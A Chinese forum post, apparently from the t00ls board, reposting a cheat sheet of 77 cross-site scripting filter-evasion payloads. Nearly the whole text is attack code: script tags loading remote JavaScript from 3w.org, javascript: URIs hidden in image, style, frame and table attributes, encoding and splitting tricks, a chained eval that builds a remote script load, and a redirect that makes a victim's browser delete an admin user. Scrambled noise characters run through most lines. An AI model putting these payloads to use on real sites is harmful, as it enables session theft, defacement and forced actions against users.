貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
: |# ~* g9 z7 T( ?(1)普通的XSS JavaScript注入
! g! C0 K4 o3 P<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ o9 j. I- ]& ?+ Q(2)IMG标签XSS使用JavaScript命令. z# |6 x- X! Q; k
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>; D" v' a; h8 N2 u1 w
(3)IMG标签无分号无引号
0 h+ L2 }. \3 H/ q a<IMG SRC=javascript:alert(‘XSS’)>
+ o; K) G& ?5 |# x4 E8 P(4)IMG标签大小写不敏感! ^# k* y- x) }- U5 t4 H
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
A+ P2 V0 \& ]6 A0 Y4 ~. T% Z5 F(5)HTML编码(必须有分号)
3 t; L3 b& x [ c5 H- v" x4 M# j7 c<IMG SRC=javascript:alert(“XSS”)>' q- \0 y, e. f, Y
(6)修正缺陷IMG标签
- {/ [: S* L9 {<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, L) u( I% u2 k& m) X
_2 t5 s* k- N, a" g. n5 i" s# K6 q2 E& Y1 i, U0 t
(7)formCharCode标签(计算器)
3 e- N% Y; T6 C4 v9 r5 u2 W<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
9 j/ A! Q! h2 D. l(8)UTF-8的Unicode编码(计算器)
?1 p! P* x# S; U! i1 k0 H<IMG SRC=jav..省略..S')>
5 U7 X4 d) F( D$ E(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
( `* G: s; n% ?% s<IMG SRC=jav..省略..S')>9 G; R: K& e% O) g7 H$ H
(10)十六进制编码也是没有分号(计算器)/ s$ m# D! c, T* }
<IMG SRC=java..省略..XSS')>, ` ]4 m0 T) m# o& r& v i6 |
(11)嵌入式标签,将Javascript分开
` M3 ?; g z+ w<IMG SRC=”jav ascript:alert(‘XSS’);”>8 t, P" U; @% R( a
(12)嵌入式编码标签,将Javascript分开- O: m" h) p6 e) p0 I& W$ C5 l
<IMG SRC=”jav ascript:alert(‘XSS’);”>: ?* E! t2 [, M. y( J
(13)嵌入式换行符 D' i9 G2 M5 R- e9 V' a3 t' T! z5 k
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% u( I: B$ X% O1 N5 D(14)嵌入式回车$ L/ ] S, f+ N9 r; K4 Y. j
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( w3 Q( i1 z. p2 [% L' p(15)嵌入式多行注入JavaScript,这是XSS极端的例子
* h7 I8 _3 J% [) V; \& \1 T<IMG SRC=”javascript:alert(‘XSS‘)”>
0 V; G6 \' B: a! B& e( Q(16)解决限制字符(要求同页面)
2 M2 x/ K3 I6 P; d$ ]<script>z=’document.’</script>5 n3 y( l6 N0 H2 x( _' F# {% t: h
<script>z=z+’write(“‘</script>
* j1 T" Y3 l, l4 [<script>z=z+’<script’</script>$ c" R4 {. ?- H: a( ?
<script>z=z+’ src=ht’</script>
5 E7 T+ G7 x1 d' I) k<script>z=z+’tp://ww’</script> h9 ^* ~" ~: Q3 u
<script>z=z+’w.shell’</script>) [6 K& C$ ~9 B) U7 X- F
<script>z=z+’.net/1.’</script>6 {# Y8 I, L1 ?' L6 U
<script>z=z+’js></sc’</script>" K5 a/ e. u* v# H- u8 B
<script>z=z+’ript>”)’</script># u5 S3 T& \. G+ H, r
<script>eval_r(z)</script>
. @' Y8 M, o X( _/ v. f(17)空字符12-7-1 T00LS - Powered by Discuz! Board8 s: m7 x' H, {8 m1 a# o, T$ Y
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
2 c; g% l! t- H& c, z, t% M/ D' Vperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 I3 ~' N# Y& h1 f1 B(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
. _( d5 ~6 z M5 k3 nperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out1 \" S v! ]3 P& p6 B
(19)Spaces和meta前的IMG标签
7 ^9 p2 J# V; a) o f6 y! N<IMG SRC=” javascript:alert(‘XSS’);”>: `2 R! [3 o4 K* H7 y+ b! Q. l; i
(20)Non-alpha-non-digit XSS
5 I8 F: x9 F( l<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 V* m. m/ F# I8 q
(21)Non-alpha-non-digit XSS to 2* I, E' K: e" v2 ?% }
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>$ {0 I0 A. }+ ?( g" d5 q. y
(22)Non-alpha-non-digit XSS to 3
0 v% U! s+ I: `6 R0 o* `) U6 c<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
7 m: f9 y( f$ g* q( O# J4 e' i0 D(23)双开括号
/ Q c1 p6 v4 n" ?6 T<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 Q0 a* Y/ s7 b/ ?% Z(24)无结束脚本标记(仅火狐等浏览器)
0 j' ?: Z$ w) P2 q C<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>- Z( z! {0 U# m; P- K
(25)无结束脚本标记2$ R( ~' | J$ e1 I4 ?. Q6 G8 ? _+ s
<SCRIPT SRC=//3w.org/XSS/xss.js>
. y" G7 B( L; F) `0 W! j+ K& o* p(26)半开的HTML/JavaScript XSS3 S4 l- t- v8 E7 O, ~
<IMG SRC=”javascript:alert(‘XSS’)”9 T( D" H. {; ^5 [ s
(27)双开角括号
0 X T% d2 {6 B) q<iframe src=http://3w.org/XSS.html <9 q0 g: ^$ U8 M4 E8 X! ]
(28)无单引号 双引号 分号/ T! T" j6 a- w+ X2 O4 m
<SCRIPT>a=/XSS/
2 c. _; H( m; U0 V" @) ~alert(a.source)</SCRIPT>3 G2 J4 t2 L% N: z0 j4 R& Z) e% I* f
(29)换码过滤的JavaScript& R! G+ p% A/ a- K' N% i/ m- y
\”;alert(‘XSS’);//
5 ?( v2 N2 K0 h- d' [# h* |(30)结束Title标签1 o0 n2 {5 R7 W1 S( E% |9 v/ ~4 K3 L
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>- [7 m) h6 c, |0 y% d
(31)Input Image
2 |. z, @: h2 W1 \<INPUT SRC=”javascript:alert(‘XSS’);”>, P+ k! M. N7 Z/ Q! u, C* s6 S
(32)BODY Image
# b' z* q2 q; f9 K6 M0 D J4 J<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
0 Z7 X2 ~, x, Q* F; b6 L# U(33)BODY标签
; F) S1 }) N9 Z C f<BODY(‘XSS’)>2 f$ J ?! j4 }: c/ A3 ~
(34)IMG Dynsrc& X! C2 E: Y2 o. r% k3 }
<IMG DYNSRC=”javascript:alert(‘XSS’)”>4 J# A, G% y. `8 W, C
(35)IMG Lowsrc6 d* m% B! W1 O+ X' i5 b2 K9 F& Q- s
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ F, ^2 l/ [3 R% j7 N4 T& ?& R2 ~(36)BGSOUND& W0 v8 e* @5 o+ P; Y% z4 S( o/ Y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 ]8 C( J x H0 x(37)STYLE sheet
- \5 E6 S y- S* t<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
. b9 H' X6 O( d& K$ p(38)远程样式表
+ O b0 q1 d* X. O<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>) n( s# o" S- q2 Q2 q& R4 O
(39)List-style-image(列表式)
) J; k& p3 k; y7 ?" d<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
7 U: P) M5 D+ }: |0 @/ c- T7 w(40)IMG VBscript6 z8 s4 F7 m! S! p
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
4 `6 o1 F7 x; V9 e8 \(41)META链接url8 ^' G7 u4 t* `( x" n' T- }
4 G' R# y9 |1 P. C2 d7 v& a% B( K9 F+ K2 Z) R# i( L# o7 f o
<META HTTP-EQUIV=”refresh” CONTENT=”0;. `) e1 T- q" e; g$ p0 ^# s
URL=http://;URL=javascript:alert(‘XSS’);”>0 e: g4 @3 F- Q/ l: Z
(42)Iframe
9 z* y9 u: g# e<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
) b- M& l' T* z. m2 P. Z, @. a4 y(43)Frame1 B; ~6 R- U w) I% i
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board( R9 w' K% q A/ w
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
: w7 T& S/ ~2 h* a( q0 d(44)Table
: J! f: z0 t% P# B<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 P! p6 I3 u& R6 j( Q5 W(45)TD
4 R8 t1 a2 O5 w ~: f<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>1 F: i& x7 n: W( g
(46)DIV background-image
; ^5 j9 r4 g8 X<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>) y7 M; |4 b, B9 I& X) M. V( K/ E
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-# r! p, j3 j/ E4 x5 V
8&13&12288&65279)
2 V U" G- t& U+ N9 t5 t( ]<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 _$ Y" T% c+ n: Y+ _5 l. T
(48)DIV expression$ ]" x: e5 N; R# T$ {
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
9 W6 O1 L# y6 E- ]8 H(49)STYLE属性分拆表达. A9 o1 d) D# z' D3 C
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>: w9 j, f2 H, D# N& A7 r& n
(50)匿名STYLE(组成:开角号和一个字母开头)3 n9 S% {; [6 f- W0 V# V! y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>; l9 n- U; j1 L3 u8 O' ]
(51)STYLE background-image
9 Z7 D, t, z1 r5 F) O<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
- [+ L0 K# j7 b) j* QCLASS=XSS></A>1 y& X/ `7 ?4 e0 Y; g
(52)IMG STYLE方式
* } A) v0 t& x3 F4 W! t; Texppression(alert(“XSS”))’>
3 V) k( \* i9 O( ~) m(53)STYLE background4 A4 S3 I8 C; M- Z
<STYLE><STYLE6 Z6 s4 u" {& O+ w' G1 M, _
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 W/ o' e" O8 O; C(54)BASE" L, J# u! J1 S. b2 @/ u
<BASE HREF=”javascript:alert(‘XSS’);//”>6 Q* X+ l( Z1 T, J5 [
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
X, I+ v' u2 h1 I5 I<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>5 ~$ R3 `2 I( I- ?# b" O4 u6 j
(56)在flash中使用ActionScrpt可以混进你XSS的代码 L2 y" v9 F" \3 p- X
a=”get”;4 A" Q* C; X3 m2 i; s' @
b=”URL(\”";
* r+ L" S4 W' M% g8 _c=”javascript:”;, Q: H* ?- a: o6 c
d=”alert(‘XSS’);\”)”;
$ b, U+ r# a5 ~eval_r(a+b+c+d);# |; ~, R( O& c7 @
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
$ }, n4 l J5 T+ m. c1 R' D<HTML xmlns:xss>! d7 w8 d1 P' f* \+ a2 y% i/ m
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) J; v7 U, P2 j3 h<xss:xss>XSS</xss:xss>$ T/ V. e9 B* @+ `6 K2 M4 @
</HTML>
) q, C( y* \, U1 l- c5 E1 e0 s(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
3 A& Z8 V; q+ ~+ J<SCRIPT SRC=””></SCRIPT>
: f4 h$ a' c6 s0 C, J(59)IMG嵌入式命令,可执行任意命令
6 a! y* ?0 V4 [. N<IMG SRC=”http://www.XXX.com/a.php?a=b”>4 B7 o: j1 N$ G. E. Y& y" }- y
(60)IMG嵌入式命令(a.jpg在同服务器)5 A3 K; @* k( a# B
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
. D$ E) \! H I" R0 g( v(61)绕符号过滤: p% O; f+ }% N" B
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 R1 z( l w8 K$ h
(62)
: G- _! W+ ^6 F/ h# w<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT># H1 H* B/ _& }, p. \) F- W
(63)
/ I' {9 G: _0 p4 u7 T3 f<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! _7 B6 ^# A _% G1 _4 w
(64)
$ [5 }; e* Y, B. B% G<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>1 T* m; |4 X7 L0 u+ o6 s
(65)0 x% j( Q: I6 w( |
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>9 a) i! T# S; z' X# A# @6 U
(66)12-7-1 T00LS - Powered by Discuz! Board& h7 e) m8 f% u" Q+ ?$ y) s
https://www.t00ls.net/viewthread ... table&tid=15267 4/65 R6 X( T( \/ `
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>" O7 M% n8 m/ F# Q" |8 V
(67)
V3 H2 K5 x6 b& f<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
4 P$ \- H; p% _" v6 c( o, u; B. J</SCRIPT>( l. I L7 f" \) R2 b0 O
(68)URL绕行( c7 \" O* T1 M7 {* @* S0 f
<A HREF=”http://127.0.0.1/”>XSS</A>
% n4 P; l u" G3 n+ X' F5 p(69)URL编码* x8 I' G- D5 s" W: G
<A HREF=”http://3w.org”>XSS</A>8 c# g' t/ U* x6 d+ u! i6 s2 e+ f
(70)IP十进制" B. M9 ~2 ]6 B: F# _9 u5 W! `8 g! G- m
<A HREF=”http://3232235521″>XSS</A>4 N* q, q' M& }' e* k8 d
(71)IP十六进制3 x! N4 X- z% O4 p" Y9 u
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>8 u/ A9 t& L$ g# n# W1 [
(72)IP八进制( a7 t% @/ G" B. p
<A HREF=”http://0300.0250.0000.0001″>XSS</A>: Z/ k0 U5 F- g9 F- K6 Q
(73)混合编码
4 R3 L" D3 E8 n* g( w+ C) ` [<A HREF=”h
! s9 Q" w5 ~3 G, V; p# w' Q* [9 [# Itt p://6 6.000146.0×7.147/”">XSS</A>
# P+ `; O' c" R) a(74)节省[http:]- ?5 ?+ O$ x$ |+ P" x: `# f
<A HREF=”//www.google.com/”>XSS</A>6 X5 ^# l0 A8 f7 O! S
(75)节省[www]
) D9 v, ^' E9 _1 Z$ D) v2 e<A HREF=”http://google.com/”>XSS</A>/ k* G" T3 ~+ F
(76)绝对点绝对DNS
p+ c0 \& j7 D) D<A HREF=”http://www.google.com./”>XSS</A>
9 ?- s' j$ A! U. e3 U2 K(77)javascript链接
7 r' P! ~. E2 d( c<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
1 Y0 b+ o6 J4 f) Q
0 E5 [; Q; R/ }# P9 ~6 G原文地址:http://fuzzexp.org/u/0day/?p=14
_; ?: Z. g3 \; t& [7 U
& P6 P8 _( z9 L |
发表于 2013-4-19 19:22:37
收藏
支持
反对